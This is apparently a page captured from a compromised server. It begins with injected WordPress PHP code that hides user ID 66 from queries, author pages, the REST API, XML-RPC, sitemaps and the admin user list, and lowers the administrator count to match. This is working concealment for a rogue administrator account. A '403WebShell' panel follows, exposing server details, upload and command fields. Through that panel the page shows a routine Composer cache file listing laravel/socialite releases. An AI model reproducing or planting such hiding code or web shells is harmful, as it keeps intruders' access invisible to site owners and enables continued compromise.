add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/.cache/composer/repo/https---repo.packagist.org/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/.cache/composer/repo/https---repo.packagist.org/provider-laravel~socialite.json
{"minified":"composer/2.0","packages":{"laravel/socialite":[{"name":"laravel/socialite","description":"Laravel wrapper around OAuth 1 & OAuth 2 libraries.","keywords":["oauth","laravel"],"homepage":"https://laravel.com","version":"v5.16.0","version_normalized":"5.16.0.0","license":["MIT"],"authors":[{"name":"Taylor Otwell","email":"taylor@laravel.com"}],"source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"40a2dc98c53d9dc6d55eadb0d490d3d72b73f1bf"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/40a2dc98c53d9dc6d55eadb0d490d3d72b73f1bf","type":"zip","shasum":"","reference":"40a2dc98c53d9dc6d55eadb0d490d3d72b73f1bf"},"type":"library","support":{"issues":"https://github.com/laravel/socialite/issues","source":"https://github.com/laravel/socialite"},"funding":[],"time":"2024-09-03T09:46:57+00:00","autoload":{"psr-4":{"Laravel\\Socialite\\":"src/"}},"extra":{"branch-alias":{"dev-master":"5.x-dev"},"laravel":{"providers":["Laravel\\Socialite\\SocialiteServiceProvider"],"aliases":{"Socialite":"Laravel\\Socialite\\Facades\\Socialite"}}},"require":{"php":"^7.2|^8.0","ext-json":"*","firebase/php-jwt":"^6.4","guzzlehttp/guzzle":"^6.0|^7.0","illuminate/contracts":"^6.0|^7.0|^8.0|^9.0|^10.0|^11.0","illuminate/http":"^6.0|^7.0|^8.0|^9.0|^10.0|^11.0","illuminate/support":"^6.0|^7.0|^8.0|^9.0|^10.0|^11.0","league/oauth1-client":"^1.10.1","phpseclib/phpseclib":"^3.0"},"require-dev":{"mockery/mockery":"^1.0","orchestra/testbench":"^4.0|^5.0|^6.0|^7.0|^8.0|^9.0","phpstan/phpstan":"^1.10","phpunit/phpunit":"^8.0|^9.3|^10.4"}},{"version":"v5.15.1","version_normalized":"5.15.1.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"cc02625f0bd1f95dc3688eb041cce0f1e709d029"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/cc02625f0bd1f95dc3688eb041cce0f1e709d029","type":"zip","shasum":"","reference":"cc02625f0bd1f95dc3688eb041cce0f1e709d029"},"time":"2024-06-28T20:09:34+00:00"},{"version":"v5.15.0","version_normalized":"5.15.0.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"c8234bfb286a8210df8d62f94562c71bfda4a446"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/c8234bfb286a8210df8d62f94562c71bfda4a446","type":"zip","shasum":"","reference":"c8234bfb286a8210df8d62f94562c71bfda4a446"},"time":"2024-06-11T13:33:20+00:00"},{"version":"v5.14.0","version_normalized":"5.14.0.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"c7b0193a3753a29aff8ce80aa2f511917e6ed68a"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/c7b0193a3753a29aff8ce80aa2f511917e6ed68a","type":"zip","shasum":"","reference":"c7b0193a3753a29aff8ce80aa2f511917e6ed68a"},"time":"2024-05-03T20:31:38+00:00"},{"version":"v5.13.2","version_normalized":"5.13.2.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"278d4615f68205722b3a129135774b3764b28a90"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/278d4615f68205722b3a129135774b3764b28a90","type":"zip","shasum":"","reference":"278d4615f68205722b3a129135774b3764b28a90"},"time":"2024-04-26T13:48:16+00:00"},{"version":"v5.13.1","version_normalized":"5.13.1.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"feed1c1ccfd991bc12af59de4aa24f657d9c5cbe"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/feed1c1ccfd991bc12af59de4aa24f657d9c5cbe","type":"zip","shasum":"","reference":"feed1c1ccfd991bc12af59de4aa24f657d9c5cbe"},"time":"2024-04-24T20:36:50+00:00"},{"version":"v5.13.0","version_normalized":"5.13.0.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"a03e9b2f63d8125f61952fe4f5b75d70fd7c8286"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/a03e9b2f63d8125f61952fe4f5b75d70fd7c8286","type":"zip","shasum":"","reference":"a03e9b2f63d8125f61952fe4f5b75d70fd7c8286"},"time":"2024-04-15T18:09:46+00:00"},{"version":"v5.12.1","version_normalized":"5.12.1.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"7dae1b072573809f32ab6dcf4aebb57c8b3e8acf"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/7dae1b072573809f32ab6dcf4aebb57c8b3e8acf","type":"zip","shasum":"","reference":"7dae1b072573809f32ab6dcf4aebb57c8b3e8acf"},"time":"2024-02-16T08:58:20+00:00","require":{"php":"^7.2|^8.0","ext-json":"*","guzzlehttp/guzzle":"^6.0|^7.0","illuminate/contracts":"^6.0|^7.0|^8.0|^9.0|^10.0|^11.0","illuminate/http":"^6.0|^7.0|^8.0|^9.0|^10.0|^11.0","illuminate/support":"^6.0|^7.0|^8.0|^9.0|^10.0|^11.0","league/oauth1-client":"^1.10.1"}},{"version":"v5.12.0","version_normalized":"5.12.0.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"ffeeb2cdf723b4c88b25479968e2d3a61a83dbe5"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/ffeeb2cdf723b4c88b25479968e2d3a61a83dbe5","type":"zip","shasum":"","reference":"ffeeb2cdf723b4c88b25479968e2d3a61a83dbe5"},"time":"2024-02-11T18:29:55+00:00"},{"version":"v5.11.0","version_normalized":"5.11.0.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"4f6a8af6f3f7c18da03d19842dd0514315501c10"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/4f6a8af6f3f7c18da03d19842dd0514315501c10","type":"zip","shasum":"","reference":"4f6a8af6f3f7c18da03d19842dd0514315501c10"},"time":"2023-12-02T18:22:36+00:00"},{"version":"v5.10.0","version_normalized":"5.10.0.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"f376b6eda9084899e37ac08bafd64a95edf9c6c0"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/f376b6eda9084899e37ac08bafd64a95edf9c6c0","type":"zip","shasum":"","reference":"f376b6eda9084899e37ac08bafd64a95edf9c6c0"},"time":"2023-10-30T22:09:58+00:00","require":{"php":"^7.2|^8.0","ext-json":"*","guzzlehttp/guzzle":"^6.0|^7.0","illuminate/contracts":"^6.0|^7.0|^8.0|^9.0|^10.0","illuminate/http":"^6.0|^7.0|^8.0|^9.0|^10.0","illuminate/support":"^6.0|^7.0|^8.0|^9.0|^10.0","league/oauth1-client":"^1.10.1"},"require-dev":{"mockery/mockery":"^1.0","orchestra/testbench":"^4.0|^5.0|^6.0|^7.0|^8.0","phpstan/phpstan":"^1.10","phpunit/phpunit":"^8.0|^9.3"}},{"version":"v5.9.1","version_normalized":"5.9.1.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"49ecc4c907ed88c1254bae991c6b2948945645c2"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/49ecc4c907ed88c1254bae991c6b2948945645c2","type":"zip","shasum":"","reference":"49ecc4c907ed88c1254bae991c6b2948945645c2"},"time":"2023-09-07T16:13:53+00:00"},{"version":"v5.9.0","version_normalized":"5.9.0.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"14acfa3262875f180fba51efe3c7aaa089a9ef24"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/14acfa3262875f180fba51efe3c7aaa089a9ef24","type":"zip","shasum":"","reference":"14acfa3262875f180fba51efe3c7aaa089a9ef24"},"time":"2023-09-05T15:20:21+00:00"},{"version":"v5.8.1","version_normalized":"5.8.1.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"9989b4530331597fae811bca240bf4e8f15e804b"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/9989b4530331597fae811bca240bf4e8f15e804b","type":"zip","shasum":"","reference":"9989b4530331597fae811bca240bf4e8f15e804b"},"time":"2023-08-21T13:06:52+00:00"},{"version":"v5.8.0","version_normalized":"5.8.0.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"50148edf24b6cd3e428aa9bc06a5d915b24376bb"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/50148edf24b6cd3e428aa9bc06a5d915b24376bb","type":"zip","shasum":"","reference":"50148edf24b6cd3e428aa9bc06a5d915b24376bb"},"time":"2023-07-14T14:22:58+00:00"},{"version":"v5.7.0","version_normalized":"5.7.0.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"f5996f499e14db15407201a6bfbaba3ce6ce736c"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/f5996f499e14db15407201a6bfbaba3ce6ce736c","type":"zip","shasum":"","reference":"f5996f499e14db15407201a6bfbaba3ce6ce736c"},"time":"2023-07-08T20:51:43+00:00"},{"version":"v5.6.3","version_normalized":"5.6.3.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"00ea7f8630673ea49304fc8a9fca5a64eb838c7e"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/00ea7f8630673ea49304fc8a9fca5a64eb838c7e","type":"zip","shasum":"","reference":"00ea7f8630673ea49304fc8a9fca5a64eb838c7e"},"time":"2023-06-06T13:42:43+00:00"},{"version":"v5.6.2","version_normalized":"5.6.2.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"8789ccb422c0aa2c9b2d36aeb0b544f5c9c59586"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/8789ccb422c0aa2c9b2d36aeb0b544f5c9c59586","type":"zip","shasum":"","reference":"8789ccb422c0aa2c9b2d36aeb0b544f5c9c59586"},"time":"2023-05-29T14:51:54+00:00"},{"version":"v5.6.1","version_normalized":"5.6.1.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"a14a177f2cc71d8add71e2b19e00800e83bdda09"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/a14a177f2cc71d8add71e2b19e00800e83bdda09","type":"zip","shasum":"","reference":"a14a177f2cc71d8add71e2b19e00800e83bdda09"},"time":"2023-01-20T15:42:35+00:00","require-dev":{"mockery/mockery":"^1.0","orchestra/testbench":"^4.0|^5.0|^6.0|^7.0|^8.0","phpunit/phpunit":"^8.0|^9.3"}},{"version":"v5.6.0","version_normalized":"5.6.0.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"dae03ca4ecfe3badafcdfb81965d2279080051f4"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/dae03ca4ecfe3badafcdfb81965d2279080051f4","type":"zip","shasum":"","reference":"dae03ca4ecfe3badafcdfb81965d2279080051f4"},"time":"2023-01-13T15:04:44+00:00"},{"version":"v5.5.8","version_normalized":"5.5.8.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"6cf5b7ba151e2a12aadb2ae190c785263af7f160"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/6cf5b7ba151e2a12aadb2ae190c785263af7f160","type":"zip","shasum":"","reference":"6cf5b7ba151e2a12aadb2ae190c785263af7f160"},"time":"2023-01-05T09:38:26+00:00","require":{"php":"^7.2|^8.0","ext-json":"*","guzzlehttp/guzzle":"^6.0|^7.0","illuminate/contracts":"^6.0|^7.0|^8.0|^9.0","illuminate/http":"^6.0|^7.0|^8.0|^9.0","illuminate/support":"^6.0|^7.0|^8.0|^9.0","league/oauth1-client":"^1.10.1"},"require-dev":{"mockery/mockery":"^1.0","orchestra/testbench":"^4.0|^5.0|^6.0|^7.0","phpunit/phpunit":"^8.0|^9.3"}},{"version":"v5.5.7","version_normalized":"5.5.7.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"ee6201f539ac47c3a55132449f9d20ee928f0ee2"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/ee6201f539ac47c3a55132449f9d20ee928f0ee2","type":"zip","shasum":"","reference":"ee6201f539ac47c3a55132449f9d20ee928f0ee2"},"time":"2022-12-28T12:35:23+00:00"},{"version":"v5.5.6","version_normalized":"5.5.6.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"1cd1682b709b8808a5b5dbb68179a58d1342aa7b"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/1cd1682b709b8808a5b5dbb68179a58d1342aa7b","type":"zip","shasum":"","reference":"1cd1682b709b8808a5b5dbb68179a58d1342aa7b"},"time":"2022-11-08T15:07:05+00:00"},{"version":"v5.5.5","version_normalized":"5.5.5.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"ce8b2f967eead5a6bae74449e207be6f8046edc3"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/ce8b2f967eead5a6bae74449e207be6f8046edc3","type":"zip","shasum":"","reference":"ce8b2f967eead5a6bae74449e207be6f8046edc3"},"time":"2022-08-20T21:32:07+00:00"},{"version":"v5.5.4","version_normalized":"5.5.4.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"3eec261bf83690dd85812587457f093e3156dca6"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/3eec261bf83690dd85812587457f093e3156dca6","type":"zip","shasum":"","reference":"3eec261bf83690dd85812587457f093e3156dca6"},"time":"2022-08-08T13:27:06+00:00"},{"version":"v5.5.3","version_normalized":"5.5.3.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"9dfc76b31ee041c45a7cae86f23339784abde46d"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/9dfc76b31ee041c45a7cae86f23339784abde46d","type":"zip","shasum":"","reference":"9dfc76b31ee041c45a7cae86f23339784abde46d"},"time":"2022-07-18T13:51:19+00:00"},{"version":"v5.5.2","version_normalized":"5.5.2.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"68afb03259b82d898c68196cbcacd48596a9dd72"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/68afb03259b82d898c68196cbcacd48596a9dd72","type":"zip","shasum":"","reference":"68afb03259b82d898c68196cbcacd48596a9dd72"},"time":"2022-03-10T15:26:19+00:00","require":{"php":"^7.2|^8.0","ext-json":"*","guzzlehttp/guzzle":"^6.0|^7.0","illuminate/http":"^6.0|^7.0|^8.0|^9.0","illuminate/support":"^6.0|^7.0|^8.0|^9.0","league/oauth1-client":"^1.0"},"require-dev":{"illuminate/contracts":"^6.0|^7.0|^8.0|^9.0","mockery/mockery":"^1.0","orchestra/testbench":"^4.0|^5.0|^6.0|^7.0","phpunit/phpunit":"^8.0|^9.3"}},{"version":"v5.5.1","version_normalized":"5.5.1.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"9b96dfd69e9c1de69c23205cb390550bc71c357e"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/9b96dfd69e9c1de69c23205cb390550bc71c357e","type":"zip","shasum":"","reference":"9b96dfd69e9c1de69c23205cb390550bc71c357e"},"time":"2022-02-07T16:08:19+00:00"},{"version":"v5.5.0","version_normalized":"5.5.0.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"cb5b5538c207efa19aa5d7f46cd76acb03ec3055"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/cb5b5538c207efa19aa5d7f46cd76acb03ec3055","type":"zip","shasum":"","reference":"cb5b5538c207efa19aa5d7f46cd76acb03ec3055"},"time":"2022-02-01T16:31:36+00:00"},{"version":"v5.4.0","version_normalized":"5.4.0.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"4b1999232a572dfe61f42c7295490d1372dad097"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/4b1999232a572dfe61f42c7295490d1372dad097","type":"zip","shasum":"","reference":"4b1999232a572dfe61f42c7295490d1372dad097"},"time":"2022-01-25T20:10:22+00:00"},{"version":"v5.3.0","version_normalized":"5.3.0.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"4e6f7e40de9a54ad641de5b8e29cdf1e73842e10"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/4e6f7e40de9a54ad641de5b8e29cdf1e73842e10","type":"zip","shasum":"","reference":"4e6f7e40de9a54ad641de5b8e29cdf1e73842e10"},"time":"2022-01-12T18:05:39+00:00"},{"version":"v5.2.6","version_normalized":"5.2.6.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"b5c67f187ddcf15529ff7217fa735b132620dfac"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/b5c67f187ddcf15529ff7217fa735b132620dfac","type":"zip","shasum":"","reference":"b5c67f187ddcf15529ff7217fa735b132620dfac"},"time":"2021-12-07T16:32:57+00:00","require":{"php":"^7.2|^8.0","ext-json":"*","guzzlehttp/guzzle":"^6.0|^7.0","illuminate/http":"^6.0|^7.0|^8.0","illuminate/support":"^6.0|^7.0|^8.0","league/oauth1-client":"^1.0"},"require-dev":{"illuminate/contracts":"^6.0|^7.0","mockery/mockery":"^1.0","orchestra/testbench":"^4.0|^5.0|^6.0","phpunit/phpunit":"^8.0|^9.3"}},{"version":"v5.2.5","version_normalized":"5.2.5.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"fd0f6a3dd963ca480b598649b54f92d81a43617f"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/fd0f6a3dd963ca480b598649b54f92d81a43617f","type":"zip","shasum":"","reference":"fd0f6a3dd963ca480b598649b54f92d81a43617f"},"time":"2021-08-31T15:16:26+00:00"},{"version":"v5.2.4","version_normalized":"5.2.4.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"59e2f8d9d9663029c7746a92d60bbb7697953bb9"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/59e2f8d9d9663029c7746a92d60bbb7697953bb9","type":"zip","shasum":"","reference":"59e2f8d9d9663029c7746a92d60bbb7697953bb9"},"time":"2021-08-10T17:44:52+00:00"},{"version":"v5.2.3","version_normalized":"5.2.3.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"1960802068f81e44b2ae9793932181cf1cb91b5c"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/1960802068f81e44b2ae9793932181cf1cb91b5c","type":"zip","shasum":"","reference":"1960802068f81e44b2ae9793932181cf1cb91b5c"},"time":"2021-04-06T14:38:16+00:00"},{"version":"v5.2.2","version_normalized":"5.2.2.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"8d25d574b4f2005411c0b9cb527ef5e745c1b07d"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/8d25d574b4f2005411c0b9cb527ef5e745c1b07d","type":"zip","shasum":"","reference":"8d25d574b4f2005411c0b9cb527ef5e745c1b07d"},"time":"2021-03-02T16:50:47+00:00"},{"version":"v5.2.1","version_normalized":"5.2.1.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"8aa705d771f127317f60887515cfb2f777653ce5"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/8aa705d771f127317f60887515cfb2f777653ce5","type":"zip","shasum":"","reference":"8aa705d771f127317f60887515cfb2f777653ce5"},"time":"2021-02-22T14:22:51+00:00"},{"version":"v5.2.0","version_normalized":"5.2.0.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"c0c85cccdad53e1916b9ba27c95daaaec591d113"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/c0c85cccdad53e1916b9ba27c95daaaec591d113","type":"zip","shasum":"","reference":"c0c85cccdad53e1916b9ba27c95daaaec591d113"},"time":"2021-02-16T17:07:37+00:00"},{"version":"v5.1.3","version_normalized":"5.1.3.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"2e6beafe911a09f2300353c102d882e9d63f1f72"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/2e6beafe911a09f2300353c102d882e9d63f1f72","type":"zip","shasum":"","reference":"2e6beafe911a09f2300353c102d882e9d63f1f72"},"time":"2021-01-05T17:02:09+00:00"},{"version":"v5.1.2","version_normalized":"5.1.2.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"19fc65ac28e0b4684a8735b14c1dc6f6ef5d62c7"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/19fc65ac28e0b4684a8735b14c1dc6f6ef5d62c7","type":"zip","shasum":"","reference":"19fc65ac28e0b4684a8735b14c1dc6f6ef5d62c7"},"time":"2020-12-04T15:30:50+00:00"},{"version":"v5.1.1","version_normalized":"5.1.1.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"dc786c41eb3615ca430da3b9aa5c9c0282f7e390"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/dc786c41eb3615ca430da3b9aa5c9c0282f7e390","type":"zip","shasum":"","reference":"dc786c41eb3615ca430da3b9aa5c9c0282f7e390"},"time":"2020-11-24T17:34:35+00:00"},{"version":"v5.1.0","version_normalized":"5.1.0.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"14082c665186348028e5bde17ab33b21b36dac79"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/14082c665186348028e5bde17ab33b21b36dac79","type":"zip","shasum":"","reference":"14082c665186348028e5bde17ab33b21b36dac79"},"time":"2020-11-03T19:24:43+00:00"},{"version":"v5.0.3","version_normalized":"5.0.3.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"8197acf2fe5446a2800b95d250c1da72fd6051bc"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/8197acf2fe5446a2800b95d250c1da72fd6051bc","type":"zip","shasum":"","reference":"8197acf2fe5446a2800b95d250c1da72fd6051bc"},"time":"2020-10-21T12:45:02+00:00","require":{"php":"^7.2","ext-json":"*","guzzlehttp/guzzle":"^6.0|^7.0","illuminate/http":"^6.0|^7.0|^8.0","illuminate/support":"^6.0|^7.0|^8.0","league/oauth1-client":"^1.0"},"require-dev":{"illuminate/contracts":"^6.0|^7.0","mockery/mockery":"^1.0","orchestra/testbench":"^4.0|^5.0|^6.0","phpunit/phpunit":"^8.0"}},{"version":"v5.0.2","version_normalized":"5.0.2.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"87dfaaa0e0a85b707582e4f9bc8dab9664dcb0a4"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/87dfaaa0e0a85b707582e4f9bc8dab9664dcb0a4","type":"zip","shasum":"","reference":"87dfaaa0e0a85b707582e4f9bc8dab9664dcb0a4"},"time":"2020-10-20T18:53:05+00:00"},{"version":"v5.0.1","version_normalized":"5.0.1.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"61ad2b5f98e28f8e4e479851f8744b43ebbb9b46"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/61ad2b5f98e28f8e4e479851f8744b43ebbb9b46","type":"zip","shasum":"","reference":"61ad2b5f98e28f8e4e479851f8744b43ebbb9b46"},"time":"2020-09-12T14:40:16+00:00"},{"version":"v5.0.0","version_normalized":"5.0.0.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"35d71b24fd25f797eb67d060c578b3c292314aa6"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/35d71b24fd25f797eb67d060c578b3c292314aa6","type":"zip","shasum":"","reference":"35d71b24fd25f797eb67d060c578b3c292314aa6"},"time":"2020-09-08T15:11:41+00:00"},{"version":"v4.4.1","version_normalized":"4.4.1.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"80951df0d93435b773aa00efe1fad6d5015fac75"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/80951df0d93435b773aa00efe1fad6d5015fac75","type":"zip","shasum":"","reference":"80951df0d93435b773aa00efe1fad6d5015fac75"},"time":"2020-06-03T13:30:03+00:00","extra":{"branch-alias":{"dev-master":"4.x-dev"},"laravel":{"providers":["Laravel\\Socialite\\SocialiteServiceProvider"],"aliases":{"Socialite":"Laravel\\Socialite\\Facades\\Socialite"}}},"require":{"php":"^7.1.3","ext-json":"*","guzzlehttp/guzzle":"^6.0|^7.0","illuminate/http":"~5.7.0|~5.8.0|^6.0|^7.0","illuminate/support":"~5.7.0|~5.8.0|^6.0|^7.0","league/oauth1-client":"^1.0"},"require-dev":{"illuminate/contracts":"~5.7.0|~5.8.0|^6.0|^7.0","mockery/mockery":"^1.0","orchestra/testbench":"^3.7|^3.8|^4.0|^5.0","phpunit/phpunit":"^7.0|^8.0"}},{"version":"v4.4.0","version_normalized":"4.4.0.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"1c1c7458d10aad8957f706346a8c987033b997ad"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/1c1c7458d10aad8957f706346a8c987033b997ad","type":"zip","shasum":"","reference":"1c1c7458d10aad8957f706346a8c987033b997ad"},"time":"2020-06-02T16:47:45+00:00","require-dev":{"illuminate/contracts":"~5.7.0|~5.8.0|^6.0|^7.0","mockery/mockery":"^1.0","phpunit/phpunit":"^7.0|^8.0"}},{"version":"v4.3.2","version_normalized":"4.3.2.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"4bd66ee416fea04398dee5b8c32d65719a075db4"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/4bd66ee416fea04398dee5b8c32d65719a075db4","type":"zip","shasum":"","reference":"4bd66ee416fea04398dee5b8c32d65719a075db4"},"time":"2020-02-04T15:30:01+00:00","require":{"php":"^7.1.3","ext-json":"*","guzzlehttp/guzzle":"~6.0","illuminate/http":"~5.7.0|~5.8.0|^6.0|^7.0","illuminate/support":"~5.7.0|~5.8.0|^6.0|^7.0","league/oauth1-client":"~1.0"},"funding":"__unset"},{"version":"v4.3.1","version_normalized":"4.3.1.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"2d670d5b100ef2dc72dc578126b2b97985791f52"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/2d670d5b100ef2dc72dc578126b2b97985791f52","type":"zip","shasum":"","reference":"2d670d5b100ef2dc72dc578126b2b97985791f52"},"time":"2019-11-26T17:39:15+00:00","extra":{"branch-alias":{"dev-master":"4.0-dev"},"laravel":{"providers":["Laravel\\Socialite\\SocialiteServiceProvider"],"aliases":{"Socialite":"La